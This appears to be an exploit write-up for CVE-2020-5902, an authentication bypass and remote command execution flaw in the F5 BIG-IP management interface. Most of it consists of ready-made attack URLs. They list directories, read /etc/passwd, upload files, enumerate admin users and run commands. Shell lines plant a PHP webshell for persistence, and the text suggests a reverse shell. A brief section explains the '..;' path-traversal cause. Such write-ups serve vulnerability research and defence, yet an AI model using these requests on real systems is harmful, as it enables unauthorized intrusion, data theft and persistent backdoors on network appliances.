RCE on F5 Big-IP (CVE-2020-5902)

In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 and 11.6.1-11.6.5.1 there is a vulnerability on the Traffic Management User Interface (TMUI) allowing a user to bypass the authentication to read arbitrary files and execute commands.

Exploit

List files

https://{IP}:{PORT}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/etc/

Read file

https://{IP}:{PORT}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

Upload file

https://{IP}:{PORT}/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp

fileName={FILE_DESTINATION_PATH}&content={FILE_CONTENT}

https://{IP}:{PORT}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName={FILE_DESTINATION_PATH}

{"output":"{FILE_CONTENT}\n"}

List users

https://{IP}:{PORT}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

Execute commands

To execute commands, you need to create an alias then upload your command. You can use a reverse shell to gain an access to the box.

The following requests from MSF execute the id command on the vulnerable endpoint:

https://{IP}:{PORT}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash
https://{IP}:{PORT}/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content=id
https://{IP}:{PORT}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/cmd
https://{IP}:{PORT}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list

You can also upload a webshell to have a persistent access:

mount -o remount -rw /usr; echo '{BASE64_PAYLOAD}' | /usr/bin/openssl base64 -d -out /usr/local/www/xui/common/images/bg_status.php
mount -o remount -rw /usr; echo '{PHP_PAYLAOD}' > /usr/local/www/xui/common/scripts/utility.php; mount -o remount -r /usr

Technical details

The vulnerability comes from how web servers parse URL. OrangeTsai explained during a talk at the Black Hat US-18 how it's possible to bypass some verification between two different web servers. On slide 51, he shows the example of Jira to access the secure dashboard with a Path Traversal technique ..;. This is the same technique here for the F5 TMUI.

https://jira.uberinternal.com/status/..;/secure/Dashboard.jspa